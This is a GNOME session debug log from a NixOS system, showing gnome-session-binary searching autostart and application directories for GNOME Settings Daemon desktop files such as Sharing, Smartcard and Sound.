machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sharing.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
